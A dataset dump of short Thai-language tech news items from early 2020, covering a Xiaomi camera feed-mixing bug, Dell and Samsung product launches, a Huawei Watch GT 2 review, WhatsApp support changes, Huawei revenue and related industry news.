txt
stringlengths
202
53.1k
# กล้องวงจรปิด Xiaomi Security Camera มีบั๊ก แสดงภาพจากกล้องตัวอื่นที่ไม่ใช่ของเรา มีผู้ใช้กล้องวงจรปิด Xiaomi Mijia Smart IP Security Camera เปิดดูภาพจากกล้องของตัวเอง แล้วพบว่าได้ภาพจากกล้องบ้านอื่นมาแทน อาการจะเกิดเมื่อเชื่อมต่อแอพของ Xiaomi (Mi Home หรือ Mijia ในเวอร์ชันจีน) เข้ากับอุปกรณ์ของ Google/Nest (เช่น ดูภาพจากกล้องผ่านหน้าจออัจฉริยะ Nest Hub Max) อาการจะเห็นเป็นภาพล้ม ไม่ชัด และมีภาพจากกล้องตัวอื่นแทรกเข้ามา ผู้ใช้เหล่านี้รายงานปัญหาเข้ามาในกระทู้ Reddit และล่าสุดกูเกิลยืนยันปัญหาแล้วว่ามาจากฝั่ง Xiaomi โดยมาตรการของกูเกิลคือปิดการเชื่อมต่ออุปกรณ์ Mi Home กับ Google Assistant ชั่วคราว จนกว่า Xiaomi จะแก้ปัญหาได้ ที่มา - Reddit, Android Police
# ราคาหุ้น Apple ทำสถิติใหม่สูงสุดอีกครั้ง ทะลุ 300 ดอลลาร์ต่อหุ้น ราคาหุ้นของแอปเปิลยังคงเดินหน้าทำสถิติราคาสูงสุดอีกครั้ง โดยล่าสุดหลังปิดการซื้อขายของตลาดหุ้นสหรัฐ หุ้นแอปเปิลมีราคา 300.35 ดอลลาร์ต่อหุ้น มีมูลค่ากิจการตามราคาหุ้น 1.33 ล้านล้านดอลลาร์ ช่วงเวลาเดียวกันในปีที่แล้วราคาหุ้นแอปเปิลอยู่ราว 144 ดอลลาร์ และถูกปัจจัยลบต่าง ๆ จนซีอีโอ Tim Cook ต้องออกจดหมายถึงนักลงทุน ยอมรับว่ายอดขาย iPhone ต่ำกว่าที่บริษัทคาด ในช่วงที่ผ่านมาหุ้นแอปเปิลกลับมาสร้างความเชื่อมั่นอีกครั้ง จากข่าวยอดขาย iPhone 11 และ 11 Pro ที่ดีมาก รวมทั้งหูฟัง AirPods ก็มีการเติบโตที่สูงเช่นเดียวกัน ที่มา: MacRumors
# Dell เปิดตัวจอภาพชุดใหม่ รุ่นสูงสุด 4K 86 นิ้วแบบสัมผัส, 4K 43 นิ้วทำงานแทน 4 จอ, จอความแม่นยำสีสูง Dell เปิดตัวจอภาพตระกูล UltraSharp ใหม่ยกชุดในงาน CES โดยไล่ตั้งแต่จอภาพขนาดใหญ่มาก 86 นิ้ว เรื่อยไปจนถึงจอ 19 นิ้วราคาประหยัด รุ่นสูงสุดคือ Dell 86 4K Interactive Touch Monitor (C8621QT) จอสัมผัสขนาดใหญ่ 86 นิ้วสำหรับใช้แทนไวต์บอร์ดสำหรับการประชุม รองรับการสัมผัสพร้อมกัน 20 จุด มีฟีเจอร์ Screen Drop สำหรับเลื่อนด้านบนของจอลงมาเพื่อผู้ใช้ที่ส่วนสูงใช้งานด้านบนลำบาก เริ่มขายจริง 10 เมษายนนี้แต่ยังไม่ประกาศราคา รุ่นรองลงมาเป็น Dell UltraSharp 43 4K USB-C Monitor (U4320Q) จอภาพขนาดใหญ่ 43 นิ้วสำหรับงานด้านการเงินที่นิยมใช้หลายจอภาพพร้อมกันอยู่แล้ว โดยรับภาพจากพีซีได้ 4 เครื่องเพื่อแสดงผลพร้อมกัน เริ่มวางขาย 30 มกราคมนี้ ราคา 1049.99 ดอลลาร์หรือประมาณ 30,000 บาท Dell UltraSharp 27 4K USB-C Monitor (U2720Q) จอภาพสีตรงพิเศษ แสดงสีครอบคลุมพื้นที่ 95% DCI-P3 รองรับ VESA DisplayHDR 400 รุ่น 24 นิ้ว 4K ราคา 709.99 ดอลลาร์ และรุ่น 25 นิ้ว QHD ราคา 479.99 ดอลลาร์ เริ่มขาย 30 มกราคมนี้ รุ่นย่อยอื่นๆ ในตระกูล P ปรับความละเอียดต่ำสุดเป็น QHD แทน Full HD แล้ว และเพิ่มตัวเลือกสาย USB-C ส่วนตระกูล E ถูกสุด นั้นปรับปรุงฐานตั้งให้ปรับส่วนสูงได้ ที่มา - Direct2Dell
# เปิดตัว Dell Latitude 9510 โน้ตบุ๊ก 15" รองรับ 5G, แบตสูงสุด 30 ชม., น้ำหนัก 1.45 กก. เคียงคู่มากับ Dell XPS 13 ฝั่งคอนซูเมอร์ ยังมี Dell Latitude 9510 ที่เป็นโน้ตบุ๊กธุรกิจใหม่อีกตัว Dell โฆษณาว่า Latitude 9510 เป็นโน้ตบุ๊กธุรกิจขนาด 15" ที่เล็กและเบาที่สุด น้ำหนักเริ่มต้นที่ 1.45 กิโลกรัมสำหรับรุ่นปกติ และ 1.5 กิโลกรัมสำหรับรุ่น 2-in-1 สเปกอย่างอื่นคือซีพียู Core 10th Gen ใส่ได้สูงสุด i7 vPro, แรมสูงสุด 16GB, รองรับ Wi-Fi 6 AX200 และสามารถเลือกคอนฟิกใส่โมเด็มได้ทั้ง 4G LTE และ 5G ด้วย แบตเตอรี่ของ Latitude 9510 มี 2 แบบคือ 4-cell 52 WHr และ 6-cell 88 WHr ที่คุยว่าอยู่ได้นานถึง 30 ชั่วโมง พร้อมระบบชาร์จเร็ว ExpressCharge ชาร์จจาก 0% เป็น 35% ภายใน 20 นาที ฟีเจอร์อื่นที่ใส่มาคือ ExpreeSign-in ใช้กล้อง IR ตรวจจับว่าเราเข้ามาใกล้เครื่องหรือไม่เพื่อปลุกเครื่องให้ตื่น และล็อคเครื่องอัตโนมัติหากเราเดินออกไปไกล, Intelligent Audio ปรับแต่งเสียงโดยอิงกับเสียงรบกวนรอบข้าง ราคาเริ่มต้น 1,799 ดอลลาร์ เริ่มขายเดือนมีนาคม 2020 ที่มา - Dell
# Dell เปิดตัว XPS 13 รุ่นปี 2020, ซีพียู 10th Gen, สัดส่วนจอ 16:10 ขอบบางทั้ง 4 ด้านแล้ว Dell เปิดต้นปีมาด้วยการแถลงข่าวผลิตภัณฑ์ใหม่ก่อนเริ่มงาน CES 2020 ในสัปดาห์หน้า โดยโน้ตบุ๊กยอดนิยม XPS 13 ได้รับการอัพเดตประจำปี 2020 ต่อเนื่องจาก การอัพเดตรอบต้นปี 2019 หน้าตาโดยรวมของ Dell XPS 13 ยังเหมือนของเดิม สิ่งที่เปลี่ยนคือ เปลี่ยนซีพียูมาใช้ Intel Core 10th Gen รุ่นใหม่ล่าสุด (ของเดิมเป็น 8th Gen) มีให้เลือก Core i3-1005G1, i5-1035G1, i7-1065G7 ลดขอบจอให้บางลงทั้ง 4 ด้าน (ของเดิมบาง 3 ด้าน ขอบล่างยังหนาและมีโลโก้ Dell, ของใหม่ไม่มีแล้ว) ทำให้พื้นที่จอใหญ่ขึ้นอีก 6.8% ในขนาดเครื่องที่เล็กลง 2% ปรับสัดส่วนหน้าจอเป็น 16:10 ให้จอมีความสูงมากขึ้น (ของเดิม 16:9) ปรับปรุงคีย์บอร์ดให้ปุ่มใหญ่ขึ้น 9% และขยายทัชแพดให้ใหญ่ขึ้น 17%, ฝาบานพับสามารถเปิดด้วยมือเดียวได้ เพิ่มกล้องเว็บแคม IR รองรับการล็อกอินด้วยใบหน้า Windows Hello Dell ระบุว่า XPS 13 รุ่นใหม่ของปี 2020 ใช้แบตเตอรี่ขนาด 52 WHr มีเป้าหมายให้อยู่ได้นาน 19 ชั่วโมง (สำหรับคอนฟิกจอ FHD+) ราคาเริ่มต้นที่ 999.99 ดอลลาร์ มีให้เลือกสองสีคือขาว-ดำ และมีรุ่นลินุกซ์ Dell XPS 13 Developer Edition ที่ใช้ Ubuntu 18.04 LTS ให้เลือกซื้อด้วย ราคาเริ่มต้น 1,199.99 ดอลลาร์ ที่มา - Dell, Ars Technica
# ซัมซุงเปิดตัวตู้เย็น Family Hub มีกล้อง AI ตรวจได้ว่าเหลืออะไรในตู้ แนะนำว่าควรทำอะไรกินหรือควรซื้ออะไรเพิ่ม ซัมซุงเปิดตัวตู้เย็นปัญญาประดิษฐ์ Family Hub รุ่นปี 2020 เพิ่มฟีเจอร์ Smart Recipes โดยแนะนำเมนูที่ควรกินประจำสัปดาห์ จากแนวทางการกินที่ตั้งไว้ ประกอบกับวัตถุดิบที่เหลือในตู้เย็น พร้อมกับแนะนำให้ซื้อวัตถุดิบเพิ่มเติมได้ด้วย ตัวตู้เย็นมีกล้องส่องภายในและจดจำได้ว่าวัตถุดิบอะไรเหลืออยู่หรือหมดไปแล้วบ้าง และนอกจากการตั้งค่าสำหรับการกินส่วนตัวแล้ว ยังบอกได้ว่ามีแผนจะพาแขกมาที่บ้าน เพื่อตู้เย็นจะได้แนะนำรายการซื้อของมาเติมได้ ซัมซุงยังคงมองว่าตู้เย็นเป็นศูนย์รวมของอุปกรณ์ IoT ในบ้าน โดย Family Hub สามารถตรวจสถานะและสั่งการอุปกรณ์ SmartThings ในบ้านได้ทั้งหมด มองกล้องวงจรปิดได้จากห้องครัว ทางซัมซุงยังไม่เปิดเผยราคาและกำหนดการวางจำหน่าย ที่มา - Samsung
# เปิดตัวสมาร์ทว็อช Xiaomi Watch Color ราคา 3,400 บาท เริ่มขาย 3 ม.ค. Xiaomi เปิดตัว Watch Color สมาร์ทว็อชรุ่นใหม่ของทางบริษัทแบบเงียบ ๆ ช่วงปีใหม่ที่ผ่านมา มีกำหนดวางขายในวันที่ 3 ม.ค. นี้ ในตอนแรก Xiaomi ไม่เผยสเป็กของนาฬิกา แต่ล่าสุดมีภาพกล่องสินค้าหลุดมาใน Weibo ที่ช่วยเผยสเปกของนาฬิกา สเป็กของ Xiaomi Watch Color ที่ทราบจากหน้ากล่อง คือ หน้าปัดเป็น AMOLED ขนาด 1.39 นิ้ว ความละเอียด 454x454 พิกเซล, เชื่อมต่อไร้สายด้วย NFC / Bluetooth 5.0 / GPS / GLONASS, แบตเตอรีจุ 420 mAh Xiaomi เคลมว่าชาร์จแล้วใช้ได้นานสุด 14 วัน, กันน้ำมาตรฐาน 5ATM, มีฟังก์ชั่นจับอัตราการเต้นของหัวใจ ส่วนระบบปฏิบัติการยังไม่ทราบแต่ TechRadar คาดว่าใช้ Wear OS เหมือน Mi Watch ราคาของ Xiaomi Watch Color อยู่ที่ 799 หยวนหรือราว 3,400 บาท มีสีดำ, ทองและเงิน ที่มา: GSMArena, Weibo via GSMArena, TechRadar ภาพจาก Weibo
# Galaxy Note 9 เริ่มได้อัพเดต Android 10 แล้ว ซัมซุงเปิดศักราช 2020 ด้วยข่าวดีของผู้ใช้ Galaxy Note 9 เพราะปล่อยอัพเดตรอม One UI 2.0 ที่ใช้ Android 10 รุ่นเสถียรมาให้แล้ว ประเทศแรกที่ได้อัพเกรด Galaxy Note 9 เป็น Android 10 คือเยอรมนีเช่นเดิม ส่วนประเทศอื่นๆ คงต้องรอกันอีกไม่นานนัก รายชื่อฟีเจอร์ของ One UI 2.0 (นอกเหนือจากฟีเจอร์ของ Android 10 ตามปกติ) ดูได้จาก ข่าวเก่า ที่มา - SamMobile
# แอปเปิลเซ็นสัญญาใช้ทรัพย์สินทางปัญญาจาก Imagination ผู้พัฒนากราฟิก PowerVR Imagination Technologies ผู้พัฒนาส่วนกราฟิก PowerVR ออกแถลงสั้นๆ รับปีใหม่ว่า แอปเปิลได้ตกลงซื้อสิทธิ์การใช้ทรัพย์สินทางปัญญา แทนที่สัญญาเดิมที่มีมาตั้งแต่ปี 2014 โดยสัญญาใหม่จะครอบคลุมสินค้ามากกว่าเดิม บริษัท Imagination นั้นเคยเป็นผู้พัฒนาซีพียูสถาปัตยกรรม MIPS แต่ขายออกไปเมื่อปี 2017 สินค้าหลักที่ยังขายอยู่คือส่วนกราฟิก PowerVR พร้อมวงจรเร่งความเร็วปัญญาประดิษฐ์ โดยปัจจุบันเจ้าของ Imagination คือ Canyon Bridge Capital Partners ที่เป็นบริษัทลงทุนจากจีน ก่อนหน้านี้แอปเปิลเคยใช้ส่วนกราฟิก PowerVR ในซีพียูหลายตัว แต่หลังจาก iPhone X แอปเปิลก็เรื่มหันไปพัฒนาวงจรกราฟิกของตัวเอง การเซ็นสัญญาครั้งนี้ไม่ได้ระบุว่าแอปเปิลจะนำ PowerVR กลับมาใช้หรือเพียงต้องการสิทธิ์การใช้สิทธิบัตรบางตัวเท่านั้น ที่มา - Imagination, South China Morning Post ภาพประชาสัมพันธ์ส่วนกราฟิก IMG-A ของ Imagination
# WhatsApp หยุดซัพพอร์ตมือถือ Windows และแอนดรอยด์รุ่นเก่ากว่าเวอร์ชั่น 4.0.3 WhatsApp ออกมาประกาศว่าตัวแอปพลิเคชั่นจะหยุดซัพพอร์ตบนมือถือ Windows และแอนดรอยด์รุ่นเก่า โดยรุ่นที่ยังซัพพอร์ตอยู่คือ เวอร์ชั่น 4.0.3 ขึ้นไป WhatsApp ระบุว่าปัจจุบันแอปพลิเคชั่นซัพพอร์ตอุปกรณ์แอนดรอยด์เวอร์ชั่น 4.0.3 ขึ้นไป, iPhone iOS 9 ขึ้นไป,โทรศัพท์บางรุ่นที่ใช้ KaiOS 2.5.1 ส่วนอุปกรณ์แอนดรอยด์เก่าเวอร์ชั่น 2.3.7 หรือเก่ากว่านั้น และ iPhone ระบบ iOS 8 และเก่ากว่านั้น จะซัพพอร์ตถึงวันที่ 1 กุมภาพันธ์ 2020 ส่วนโทรศัพท์ Windows หยุดซัพพอร์ตไปแล้วเมื่อวันที่ 31 ธันวาคม 2019 ที่ผ่านมา โดยหลังวันที่ 1 กรกฎาคม 2019 ที่ผ่านมาร้านค้าแอปบน Microsoft Store ไม่สามารถเข้าโหลด WhatsApp ได้ ภาพจาก WhatsApp ที่มา - WhatsApp
# รีวิว Huawei Watch GT 2 สมาร์ทว็อชดีไซน์หรูแต่ฟังก์ชั่นยังไม่สมบูรณ์ เทรนด์การรักษาสุขภาพได้รับความนิยมมากขึ้นเรื่อย ๆ จึงทำให้ผู้ใช้หันมาสนใจสมาร์ทว็อชมากขึ้น และถ้าสังเกตจะเห็นว่าแบรนด์นาฬิกาชั้นนำหลายแบรนด์ก็ผลิตนาฬิกาประเภทนี้มากขึ้นเรื่อย ๆ รวมถึง Huawei Watch GT 2 ที่เปิดตัวไปเมื่อเดือนตุลาคมก็เป็นสมาร์ทว็อชอีกรุ่นที่มาพร้อมฟีเจอร์ด้านสุขภาพ รีวิวนี้ผู้เขียนนำ Huawei Watch GT 2 ไปใช้งานมาหนึ่งสัปดาห์แบบผู้ใช้ทั่วไป ไม่ได้เข้าฟิตเนส ว่ามีจุดไหนน่าสนใจและมีจุดแตกต่างจาก Apple Watch ที่เคยใช้งานมาก่อนแค่ไหน หน้าปัดทรงกลมแบบนาฬิกาชั้นนำ หน้าปัดทรงกลมของ Huawei Watch GT 2 มีสองขนาดให้เลือก คือ 42 มิลลิเมตร และ 46 มิลลิเมตร โดยรุ่นที่รีวิวเป็นรุ่น Classic สายหนัง ขนาด 46 มิลลิเมตร มีปุ่มควบคุมอยู่ที่ฝั่งขวาของหน้าปัดเท่านั้น โดยขนาดของหน้าปัด 42 มิลลิเมตร จะดูเหมาะกับผู้หญิงและผู้ชายแขนเล็ก ส่วนขนาด 46 มิลลิเมตร ตัวเรือนถือว่าใหญ่ไม่แพ้นาฬิกา Casio เรือนเหล็กเลย จึงดูเหมาะกับคนแขนใหญ่มากกว่า ส่วนของปุ่มควบคุม ปุ่มบนจะใช้เรียกเมนูต่าง ๆ ออกมา ส่วนปุ่มล่างเป็น shortcut ไว้เรียกแอปที่ตั้งค่าเอาไว้ขึ้นมา ส่วนด้านใต้ตัวเรือนจะเป็นจุดที่ฝังเซนเซอร์กับจุดชาร์จไฟเอาไว้สำหรับวัดชีพจร ลำโพงติดตั้งไว้ฝั่งเดียวกับปุ่มควบคุม ส่วนฝั่งตรงข้ามเป็นไมโครโฟนใช้คุยโทรศัพท์ได้ การเปลี่ยนสายนาฬิกาสามารถเลื่อนสลักที่โคนสายแล้วดึงสายเดิมออกได้เลย โดย Huawei Watch GT 2 จะใช้สายขนาด 22 มิลลิเมตร นอกจากสายนาฬิกาแบบหนัง จะมีสายแบบยางและสายโลหะให้ซื้อเพิ่ม นอกจากนี้ในกล่องจะมีตัวแท่นชาร์จไร้สายสำหรับนาฬิกาและสาย USB-C อีกอย่างละชิ้น แบตเตอรีใช้ต่อเนื่องถึง 1 สัปดาห์ Huawei เคลมเอาไว้ว่า Watch GT 2 สามารถใช้งานต่อเนื่องได้ 2 สัปดาห์ (14 วัน) ทางผู้เขียนทดลองชาร์จแบตให้เต็มแล้วทดลองใช้ดู ระหว่างใช้งานมีการแจ้งเตือนจากโซเชียลและแอปแชตเป็นระยะ ๆ รวมทั้งรับสายจากนาฬิกาบ้าง ผ่านไป 1 สัปดาห์ แบตเตอรีเหลือ 30% พอดี เฉลี่ยแล้วแบตเตอรีจะลดราว 10% ต่อวัน ถ้าใช้งานต่อไป คาดว่า Huawei Watch GT 2 น่าจะแบตเตอรีหมดในวันที่ 10 ถึงจะไม่นานเท่าที่ Huawei เคลมเอาไว้แต่นับว่าใช้ได้นานทีเดียว ผู้เขียนคิดว่าถ้าจะใช้ให้นานเท่าที่ Huawei เคลมไว้ คือปิดการแจ้งเตือนต่าง ๆ รวมทั้งการรับสายที่นาฬิกาทิ้งไปจะช่วยให้ใช้งานได้นานขึ้น พอแบตหมดก็ชาร์จกลับมาเต็มโดยใช้เวลาราวหนึ่งชั่วโมงเท่านั้น ฟังก์ชั่นและการควบคุม การจับคู่ Huawei Watch GT 2 กับสมาร์ทโฟนต้องทำผ่านแอป Huawei Health เท่านั้น และแอปจะบังคับผู้ใช้ติดตั้ง Huawei Mobile Services เพิ่มด้วยโดยทำผ่านแอป Huawei Health รวมทั้งการอัพเดตเฟิร์มแวร์ของนาฬิกาก็จะทำผ่านแอปเช่นกัน พอเชื่อมต่อนาฬิกากับมือถือแล้ว ที่แถบแจ้งเตือนจะมีแถบแสดงการเผาผลาญของร่างกาย นับเป็นกิโลแคลอรี (kcal) และนับก้าวเดินของผู้ใช้ แต่ทั้งสองค่าที่แสดงนั้นเป็นการเฉลี่ยมากกว่า เนื่องจากผู้เขียนทดลองถอดนาฬิกาและเอาไปแค่มือถือตัวแอปก็ยังนับก้าวอยู่ดี ใน Huawei Health จะมี 4 หมวดหลักให้ผู้ใช้เลือก คือ Health เพื่อดูสรุปข้อมูลสุขภาพส่วนตัว, Exercise ฟังก์ชั่นออกกำลังกาย, Device ที่ใช้จับคู่กับสมาร์ทโฟนและใช้โหลดเพลงเข้านาฬิกาผ่าน Bluetooth หรือเปลี่ยนหน้าปัดและ Me สำหรับตั้งค่าทั่วไป ที่นาฬิกา เมื่อปัดหน้าจอจากขอบล่างขึ้นบนจะเปิดดูการแจ้งเตือน ส่วนปัดจากขอบบนลงล่างจะเปิดแถบควบคุมนาฬิกาออกมา เลือกได้ 5 คำสั่งคือ ห้ามรบกวน (No Disturb), Show Time, Find Phone พอกดแล้วมือถือที่จับคู่กับนาฬิกาจะส่งเสียงร้องให้ผู้ใช้หาเครื่องเจอง่ายขึ้น, Alarm ที่สั่นเป็นจังหวะตอนถึงเวลาปลุก, Settings ทางลัดไปตั้งค่านาฬิกา การปัดจากขอบซ้ายหรือขวา จะเปลี่ยนจากหน้าปัดนาฬิกาเป็นกราฟแสดงอัตราการเต้นของหัวใจ, กราฟความเครียด (น่าจะวัดจากจังหวะการเต้นของหัวใจอีกที), สภาพอากาศและอุณหภูมิในพื้นที่ที่เราอยู่, แอปเล่นเพลง (Music) และ Activity records ที่รวมฟีเจอร์นับก้าว, การเตือนให้ลุกขึ้นยืนและบันทึกการออกกำลังกายเอาไว้ด้วยกัน เหมือนใน Apple Watch เป็นฟีเจอร์ที่ช่วยให้ผู้ใช้ไม่นั่งติดเก้าอี้นานจนเสียสุขภาพ การเปลี่ยนหน้าปัดนาฬิกาจะใช้วิธีการเดียวกับ Apple Watch คือเปลี่ยนที่แอปที่เชื่อมต่อกับนาฬิกาหรือแตะค้างที่หน้าจอค้างไว้สักครู่แล้วเลือกเปลี่ยน และมีหน้าปัดให้เลือกหลายแบบเช่นกัน ใช้จริงถือว่าดี แต่ยังมีจุดต้องปรับปรุง การแจ้งเตือนต่าง ๆ ที่หน้าปัดของ Huawei Watch GT 2 จะแสดงข้อความแจ้งเตือนเพียงส่วนหนึ่ง เมื่อแตะเข้าไปอ่านถึงแสดงข้อความทั้งหมด โดยเป็นตัวอักษรอย่างเดียวไม่มีอีโมจิหรือรูปภาพ การวัดอัตราการเต้นของหัวใจ ผู้เขียนทดลองใส่คู่กับ Apple Watch เพื่ออ้างอิง ปรากฏว่านาฬิกาทั้งสองเรือนแสดงผลการวัดอัตราการเต้นของหัวใจตรงกัน ส่วนอัตราการเต้นหัวใจของ Huawei จะเปลี่ยนถี่กว่า Apple Watch เล็กน้อย การฟังเพลงจากนาฬิกา ถ้าโหลดเพลงเข้านาฬิกาไว้เรียบร้อยแล้วสามารถฟังผ่านแอป Music ในนาฬิกาได้เลย และสามารถเชื่อมกับหูฟังไร้สายผ่านบลูทูธได้โดยตรง ไม่ต้องผ่านสมาร์ทโฟนเลย โดยผู้เขียนทดลองกับ Redmi AirDots แล้วทำงานตามปกติ จุดที่ไม่ประทับใจ คือแอป Music ใน Huawei Watch GT 2 เรียกแอปฟังเพลงบนมือถือขึ้นมาโดยตรงแบบ Apple Watch เรียก Apple Music, Spotify ไม่ได้ ผู้ใช้ต้องเปิดแอปฟังเพลงในมือถือด้วยตัวเองก่อน แล้ว Watch GT 2 จะทำหน้าที่เป็นรีโมตเท่านั้น คิดว่า Huawei ควรปรับปรุงส่วนนี้เป็นจุดแรก จุดด้อยต่อมาคือ นาฬิกายังบังคับใช้ฟังก์ชั่นที่มีให้เท่านั้น ไม่รองรับการเชื่อมต่อกับแอปภายนอก ผิดกับ Apple Watch ที่รองรับแอปอื่น ๆ และประสานงานกันได้ดีกว่า เช่น Spotify ที่คุมแอปในมือถือได้เลย, กดอ่านข่าว CNN บนนาฬิกาแล้วเห็นภาพและเนื้อหาข่าว, แอปกล้องที่หน้าปัดนาฬิกาเป็นหน้าจอกับชัตเตอร์ ทำให้ตั้งกล้องถ่ายง่ายขึ้น การมีข้อจำกัดแบบนี้เลยทำให้ Huawei Watch GT 2 ปรับเข้ากับไลฟ์สไตล์เฉพาะของแต่ละคนได้ลำบาก ยิ่งเมื่อเทียบกับคู่แข่งในสายแอนดรอยด์อย่าง Galaxy Watch Active 2 ที่สามารถลงแอปผ่าน Galaxy Store ได้ ก็อาจทำให้ Huawei Watch GT 2 ดูเสียเปรียบกว่าเล็กน้อย จุดอ่อนอีกจุด คือการสัมผัสหน้าจอ ถึงจะตอบสนองดีแต่พอปัดเลื่อนหาแจ้งเตือนหรือฟังก์ชั่นที่อยากใช้กลับแสดงผลไม่ลื่น เกิดอาการหน่วงอย่างรู้สึกได้ แตกต่างจาก Apple Watch หรือเป็นสมาร์ทว็อชแอนดรอยด์ด้วยกันอย่าง Galaxy Watch Active 2 แล้ว ถือว่า Huawei Watch GT 2 แสดงผลไม่ลื่นเลย ทำให้ตอนใช้งานยังขัดใจอยู่พอควร สรุป Huawei Watch GT 2 นับเป็นนาฬิกาที่ดีอีกเรือนสำหรับผู้ใช้ที่อยากได้สมาร์ทว็อชสักเรือน ใช้ได้ทั้งออกกำลังกายหรือไปงานสังคม โดยเฉพาะคนที่ออกกำลังกายจะใช้ประโยชน์จากนาฬิกาเรือนนี้ได้เต็มที่มาก ราคา 5,990 บาท นับว่าไม่แพงมาก จึงเป็นอีกตัวเลือกที่น่าสนใจสำหรับใครหลายคน ในทางกลับกัน Huawei Watch GT 2 มีจุดอ่อนหลักคือมันบังคับให้เราใช้แอปที่มีอยู่ ติดตั้งแอปอื่นให้เหมาะกับการใช้งานของผู้ใช้แต่ละคนไม่ได้ เลยทำให้ใช้งานได้ค่อนข้างจำกัด รวมทั้งการแสดงผลที่ไม่ลื่นไหลแบบสมาร์ทว็อชยี่ห้ออื่น ซึ่งสองจุดอ่อนใหญ่นี้ส่วนตัวรู้สึกว่าทำให้ Watch GT 2 เสียเปรียบคู่แข่งอยู่บ้าง
# Google เตรียมอัพเดตแพตช์เดือน 12 พ่วงไปกับแพตช์เดือน 1 สำหรับ Pixel 3 ที่ยังไม่ได้ เดือนที่แล้วเกิดปัญหาผู้ใช้ Pixel 3 หลายคนยังไม่ได้รับอัพเดตแพทช์รักษาความปลอดภัยเดือนธันวาคม 2019 จากกูเกิล จึงมีผู้ใช้ทวีตถามถึงแพทช์ดังกล่าว นอกจากนี้ในทวีตดังกล่าวก็มีผู้ใช้ Pixel 4 ยังไม่ได้อัพเดตแพทช์รักษาความปลอดภัยตั้งแต่เดือนพฤศจิกายน 2019 อีกหลายคนด้วย ทางกูเกิลได้ตอบว่าแพทช์รักษาความปลอดภัยของเดือนธันวาคม 2019 จะอัพเดตให้พร้อมกับแพทช์รักษาความปลอดภัยเดือนมกราคม 2020 เร็ว ๆ นี้ (ตามปกติคือราววันที่ 5 ของแต่ละเดือน) แต่ยังไม่ทราบรายละเอียดว่ามีอัพเดตเรื่องใดบ้าง ที่มา: 9to5Google
# Mobike สูญเสียจักรยานไปกว่า 2 แสนคัน ในปี 2019 สาเหตุหลักคือโดนขโมย Mobike ปัจจุบันรีแบรนด์ใหม่เป็น Meituan Bike สตาร์ทอัพทำบริการแชร์จักรยานออกมาเผยข้อมูลว่า ทางบริษัทได้สูญเสียจักรยานไป 205,600 คันในปี 2019 สาเหตุมาจากการพังเสียหาย และโดนขโมย Meituan Bike มีระบบเครดิตผู้ใช้งาน คือปรับคนใช้ได้ถ้าละเมิดกฎและทำจักรยานเสียหาย ไม่ว่าจะเป็นการขโมย หรือนำจักรยานไปปรับแต่ง ทาสี เป็นต้น ในบล็อกของบริษัทยังบอกด้วยว่ามีคดีจับกุมเรื่องขโมยจักรยานและทำจักรยานเสียหาย 2,600 คน เหตุการณ์ทำนองนี้ยังเกิดขึ้นในอังกฤษด้วย โดยตำรวจแมนเชสเตอร์รายงานเหตุการณ์ขโมยจักรยาน 400 ครั้งระหว่างปี 2017 - 2018 Mobike ยังถอนตัวออกจากบางเมืองในอังกฤษเข่น Newcastle เช่น Gateshead เนื่องจากมีปัญหาจักรยานหายและมีจักรยานถูกทิ้งใน River Tyne ภาพจาก Meituan Bike ที่มา - BBC
# รัสเซียเริ่มสืบสวน Booking.com เว็บจองโรงแรมเข้าข่ายผูกขาดหรือไม่ Federal Antimonopoly Service (FAS) หรือหน่วยงานต่อต้านการผุกขาดของรัสเซีย เผยว่ากำลังเริ่มสืบสวน Booking.com เว็บจองโรงแรม, โฮสเทล จากสหรัฐฯ ว่าเข้าข่ายผูกขาดหรือไม่ หลังมีรายงานว่า Booking.com ปิดกั้นไม่ให้โรงแรมเสนอราคาที่ดีกว่าบนเว็บไซต์คู่แข่งอื่นๆ หาก FAS สืบสวนพบว่า Booking.com ทำผิดกฎหมายผูกขาดรัสเซียจริง ทางบริษัทต้องจ่ายค่าปรับเป็นจำนวน 15% ของรายได้ที่ทำได้ในรัสเซีย ด้าน Booking.com ออกมาโต้ว่าทางบริษัทมีระบบเทียบราคาที่โปร่งใส และยืนยันว่าทางโรงแรมเป็นผู้กำหนดราคา ไม่ใช่ Booking.com ที่มา - Engadget
# โดนแบนก็ไม่สะเทือน Huawei ปี 2019 เติบโต 18% รายได้รวมทั้งปี 3.6 ล้านล้านบาท Huawei ประกาศผลประกอบการตลอดทั้งปี 2019 รายได้รวม 8.5 แสนล้านหยวน (ประมาณ 3.6 ล้านล้านบาท) เติบโตขึ้น 18% จากปี 2018 แม้โดนมรสุมการแบนจากรัฐบาลสหรัฐ อย่างไรก็ตาม ตัวเลขนี้ถือว่าโตน้อยกว่าที่นักวิเคราะห์คาดการณ์ไว้ และน้อยกว่าอัตราการเติบโตของปี 2018 (ทำไว้ 19.5%) แสดงให้เห็นว่าการแบนของรัฐบาลสหรัฐมีผลกระทบต่อ Huawei อยู่บ้าง ส่วนตัวเลขยอดขายมือถือของ Huawei อยู่ที่ 240 ล้านเครื่อง เติบโตขึ้นจากปี 2018 ที่ขายได้ 206 ล้านเครื่อง อย่างไรก็ตาม สมาร์ทโฟนรุ่นใหม่ๆ ของ Huawei ในปี 2020 จะเริ่มประสบปัญหาไม่มี Google Mobile Services ซึ่งย่อมส่งผลระทบต่อยอดขายเช่นกัน Eric Xu ประธานของ Huawei ประเมินสถานการณ์ปี 2020 ว่าไม่ง่าย เพราะการแบนจากรัฐบาลสหรัฐยังคงมีผลอยู่เช่นเดิม แต่บริษัทก็พยายามหาโอกาสธุรกิจใหม่ๆ เช่น โครงข่าย 5G ในอินเดีย ในจดหมายปีใหม่ของ Eric Xu ใช้รูปประกอบเป็นคนกำลังเดินขึ้นยอดเขาสูง และจับมือกันเพื่อช่วยกันดึงเพื่อนขึ้นไป พร้อมคำพูดว่าเตรียมตัวเพื่อเอาตัวรอดและพุ่งขึ้นอีกครั้ง ที่มา - Huawei, Reuters, Financial Times
